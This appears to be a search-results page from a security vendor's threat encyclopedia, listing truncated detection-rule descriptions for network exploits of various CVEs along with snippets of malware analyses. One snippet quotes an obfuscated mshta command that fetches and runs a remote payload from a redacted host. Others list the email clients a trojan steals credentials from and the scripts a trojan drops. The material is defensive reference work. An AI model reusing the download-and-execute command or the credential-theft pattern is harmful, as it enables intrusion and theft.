Search

Description Name: CVE-2019-9511 Data Dribble - HTTP2 (Request) . This is Trend Micro detection for HTTP2 network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of network behavior is likely compromise...

Description Name: CVE-2021-44790 - APACHE BUFFER OVERFLOW EXPLOIT - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting t...

Description Name: CVE-2023-38831 - WINRAR POE EXPLOIT - HTTP (Response) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry or Lateral Movement.The host exhibiting this type o...

steal stored email credentials from the following: Outlook Express IncrediMail Eudora Group Mail Free MS Outlook MS Outlook 2002/2003/2007/2010 Gmail Hotmail/MSN Yahoo! Mail Netscape Mail Thunderbird

}e.pl/meeting/su.exe - legitimate Microsoft calc.exe file It takes advantage of the following software vulnerabilities to allow a remote user or malware/grayware to download files: MS Advisory (2719615) - Vulnerability

Description Name: CVE-2019-6340 Drupal 8 RESTful Web Services Remote Code Execution - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of ...

refer to the filter number and filter name when applying appropriate DPI and/or IDF rules. 1000793| 1000793 - MS IIS Index Server File Information and Path Disclosure

also protected from attacks using these vulnerabilities. Please refer to the filter number and filter name when applying appropriate DPI and/or IDF rules. 1000121| 1000121 - MS SQL Hello Overflow

rules. 1004224| 1004224 - MS Office Excel Memory Corruption Vulnerability

Description Name: Possible CVE-2018-15454 - Cisco ASA and FTD Software DOS - UDP (Response) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of network b...

Description Name: CVE-2019-1003000 - JENKINS - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network behavior is likely c...

Description Name: CVE-2017-9798 - APACHE OPTIONSBLEED Vulnerability - HTTP (Response) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Intelligence Gathering.The host exhibiting this type...

Description Name: CVE-2018-1270 - SPRINGDATA - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network behavior is likely c...

Description Name: CVE-2017-8046 - SPRINGDATA - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network behavior is likely c...

Description Name: CVE-2018-16509 GHOSTSCRIPT UNAUTHENTICATED - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network beha...

Description Name: CVE-2022-31698 - VMWARE DDOS EXPLOIT - HTTP(REQUEST) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for N/A.The host exhibiting this type of network behavior is likely com...

processes: CMD.EXE /c ms^hta http://{BLOCKED}.2^{BLOCKED}.1{BLOCKED}.1^{BLOCKED}/vvv/ppp/f^e.ht^m^l mshta http://{BLOCKED}.2{BLOCKED}.1{BLOCKED}.1{BLOCKED}/vvv/ppp/fe.html Download Routine This Trojan accesses

) Risk Rating: Important This update resolves several vulnerabilities affecting InfoPath, SharePoint Server, SharePoint Services, SharePoint Foundation, Groove Server, and MS Office Web Apps. Read

following malware: TROJ_HELMINTH.RTF Dropping Routine This Trojan drops the following files: %User Temp%\1.vbs ← used to send Enter key to MS Word %User Temp%\0011.ps1 ← detected as TROJ_HELMINTH.PS

Description Name: CVE-2019-1652 CISCO UNAUTHENTICATED RCE - HTTP (Request) . This is Trend Micro detection for HTTP network protocol that manifests exploit activities and can be used for Point of Entry.The host exhibiting this type of network behavio...